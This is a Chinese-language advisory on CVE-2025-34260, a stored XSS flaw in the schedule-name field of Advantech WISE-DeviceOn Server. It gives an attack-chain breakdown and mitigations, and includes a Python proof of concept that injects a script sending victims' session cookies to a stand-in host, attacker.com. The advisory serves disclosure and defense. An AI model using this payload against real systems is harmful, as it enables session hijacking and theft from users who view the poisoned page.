CVE-2025-34260 Advantech WISE-DeviceOn Server存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34260

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Advantech WISE-DeviceOn Server

漏洞概述

Advantech WISE-DeviceOn Server 5.4之前版本存在存储型跨站脚本（Stored XSS）漏洞。该漏洞位于/rmm/v1/action/schedule端点，当已认证用户向现有任务添加计划时，计划名称被存储但在后续的计划列表展示中未进行HTML转义处理。攻击者可利用此漏洞在计划名称字段中注入恶意JavaScript脚本，当其他用户查看或交互受影响的计划时，恶意脚本将在其浏览器上下文中执行。此攻击可能导致会话劫持、敏感信息窃取以及在受害者权限范围内执行未授权操作。由于该漏洞需要低权限认证和用户交互才能触发，因此属于中等严重程度漏洞，但仍可能对业务系统和用户数据安全造成威胁。

技术细节

该漏洞为存储型XSS（Stored Cross-Site Scripting），攻击流程如下：攻击者首先需要获得低权限用户账号登录WISE-DeviceOn Server系统，然后向/rmm/v1/action/schedule端点发送包含恶意JavaScript代码的计划名称请求。由于后端未对用户输入的计划名称进行HTML实体编码或输入验证，恶意脚本被直接存储在数据库中。当其他用户访问计划列表页面时，后端从数据库读取计划名称并直接渲染到HTML页面中，浏览器将恶意脚本作为页面内容的一部分执行。攻击者可通过XSS窃取受害者的会话Cookie、劫持用户会话、执行任意前端操作或进行钓鱼攻击。漏洞利用需要满足以下条件：1）攻击者拥有有效认证凭证；2）受害者需要查看或交互受影响的计划列表页面。

攻击链分析

STEP 1

步骤1

攻击者获取低权限用户账号并登录WISE-DeviceOn Server系统

STEP 2

步骤2

攻击者构造恶意XSS payload并通过/rmm/v1/action/schedule端点注入到计划名称字段

STEP 3

步骤3

后端将恶意脚本未经过滤直接存储到数据库中

STEP 4

步骤4

受害者访问计划列表页面，后端从数据库读取并渲染包含恶意脚本的页面

STEP 5

步骤5

受害者浏览器执行恶意JavaScript代码，导致Cookie被盗或会话被劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-34260 PoC - Stored XSS in Advantech WISE-DeviceOn Server
# Affected Endpoint: /rmm/v1/action/schedule
# Authentication: Low privilege account required

import requests
import json

target = "https://target-server.com"
login_url = f"{target}/rmm/v1/auth/login"
schedule_url = f"{target}/rmm/v1/action/schedule"

# Authentication
credentials = {"username": "attacker", "password": "password123"}
session = requests.Session()
auth_response = session.post(login_url, json=credentials)
token = auth_response.json().get("token")

# XSS Payload - Malicious script injected into schedule name
xss_payload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>'

schedule_data = {
    "task_id": 1,
    "schedule_name": xss_payload,
    "schedule_time": "10:00",
    "schedule_type": "recurring"
}

headers = {"Authorization": f"Bearer {token}"}
response = session.post(schedule_url, json=schedule_data, headers=headers)

print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
print("XSS payload injected successfully. Wait for victim to view schedule list.")

影响范围

Advantech WISE-DeviceOn Server < 5.4

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1）限制低权限用户创建和修改计划的权限；2）启用Web应用防火墙（WAF）规则检测和阻止XSS攻击特征；3）定期审查计划列表页面的访问日志，检测异常访问模式；4）对管理员和用户进行安全意识培训，提醒不要点击可疑链接；5）考虑临时禁用计划功能模块直至完成升级。